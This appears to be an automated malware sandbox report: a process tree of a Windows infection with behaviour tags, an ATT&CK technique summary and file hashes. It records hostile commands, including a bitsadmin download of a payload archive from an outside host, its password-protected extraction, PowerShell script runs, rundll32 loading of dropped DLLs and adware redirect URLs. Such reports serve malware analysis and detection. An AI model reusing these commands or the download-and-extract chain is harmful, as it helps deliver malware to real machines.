C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7768 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7972 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8088 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xec,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x7c,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Users\Admin\AppData\Local\Temp\dd-152dd-36c-6c3a7-1e99197045e5e\Tobabawehy.exe"C:\Users\Admin\AppData\Local\Temp\dd-152dd-36c-6c3a7-1e99197045e5e\Tobabawehy.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2aoqjycs.bvi\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\2aoqjycs.bvi\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\2aoqjycs.bvi\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 25611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\installer.exeC:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632307234 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jru1gdjp.4um\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\jru1gdjp.4um\anyname.exeC:\Users\Admin\AppData\Local\Temp\jru1gdjp.4um\anyname.exe10⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3xdac5wz.vio\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\3xdac5wz.vio\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3xdac5wz.vio\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 25611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\350yy2dq.de1\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\350yy2dq.de1\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\350yy2dq.de1\autosubplayer.exe /S10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
- Checks for any installed AV software in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z11⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pF1Cp7aJwiPoTuRt -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNSkZ1CRlSRuMwfs -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JFLQwz\JFLQwz.dll" JFLQwz11⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JFLQwz\JFLQwz.dll" JFLQwz12⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT11⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 2642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3572 -ip 35721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4628 -ip 46281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4660 -ip 46601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 6084 -ip 60841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1168 -ip 11681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6108 -ip 61081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 5316 -ip 53161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4688 -ip 46881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5212 -ip 52121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5252 -ip 52521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1432 -ip 14321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DFDA0CD8D8756A85E44943F3150EE501 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EA8C32CC92ECE1CC67ED3EF56A9BA6B72⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 030E0FCE840B38D320E014F5C1C52C81 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2032 -ip 20321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5632 -ip 56321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1368 -ip 13681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6336 -ip 63361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2948 -ip 29481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1956 -ip 19561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5288 -ip 52881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 6228 -ip 62281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6096 -ip 60961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\A85B.exeC:\Users\Admin\AppData\Local\Temp\A85B.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C2AB.exeC:\Users\Admin\AppData\Local\Temp\C2AB.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3388 -s 8762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3388 -ip 33881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6324 -ip 63241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 6208 -ip 62081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6344 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6344 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 6344 -ip 63441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
568e59b049157be578b13da25b110351
SHA17f134a0efd5cda9c2898de51504ba159819ede59
SHA25698ff038dffbc25ded38d5041a157dc3e8a14b92394358446db4dc3e6d5593ee6
